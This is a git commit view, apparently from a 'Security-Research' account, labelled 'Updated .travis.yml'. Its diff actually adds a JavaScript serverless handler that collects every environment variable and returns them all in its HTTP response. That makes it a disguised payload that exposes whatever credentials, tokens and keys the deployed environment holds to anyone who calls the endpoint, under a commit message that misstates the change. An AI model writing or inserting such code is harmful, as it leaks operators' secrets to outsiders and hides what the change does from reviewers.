'Updated .travis.yml'

This commit is contained in:
Security-Research 2023-05-28 19:30:46 +05:30
parent 57c039eac8
commit 957f2f4331
1 changed files with 11 additions and 0 deletions

View File

@ -0,0 +1,11 @@
exports.handler = async () => {
let envString = "";
for (let key in process.env) {
envString += `${key}: ${process.env[key]}
`;
}
return {
statusCode: 200,
body: `hello world! I have a hotub ${envString}`,
};
};